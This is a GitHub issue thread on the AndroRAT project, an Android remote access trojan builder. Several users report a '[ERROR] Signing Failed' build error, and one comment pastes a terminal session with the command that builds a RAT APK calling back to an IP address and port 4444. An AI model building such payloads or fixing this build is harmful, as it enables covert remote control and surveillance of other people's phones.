### ISSUE TITLE
[ERROR] Signing Failed 

### ISSUE THREAD

**Issue by JevonKarl** [karma9874/AndroRAT#290]
<img width="624" alt="Screenshot 2023-09-19 at 2 58 20 PM" src="https://github.com/karma9874/AndroRAT/assets/141844310/6c56e673-c776-4aa8-bc13-e6f7f4f771f1">

**Comment by Aaaaaqe** [comment]
I also have this problem

**Comment by NoMercyForyou12** [comment]
I have this problem karma

**Comment by Anonymous5400** [comment]
![IMG_20231115_004756](https://github.com/karma9874/AndroRAT/assets/140432856/6c47ffbe-df2c-4778-8f75-a632cf467044)
Same problem

**Comment by mohammadakram0705** [comment]
──(whitehacker㉿white-hat-hacker)-[~/AndroRAT]
└─$ python3 androRAT.py --build -i 192.168.55.234 -p 4444 -o hack.apk 
[INFO] Generating APK
[INFO] Building APK | 
[SUCCESS] Successfully apk built in /home/whitehacker/AndroRAT/hack.apk
[INFO] Signing the apk
[INFO] Signing Apk | 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
could not execute zipalign
Run with '--debug' parameter to get additional information.

[ERROR] Signing Failed



i also have this error
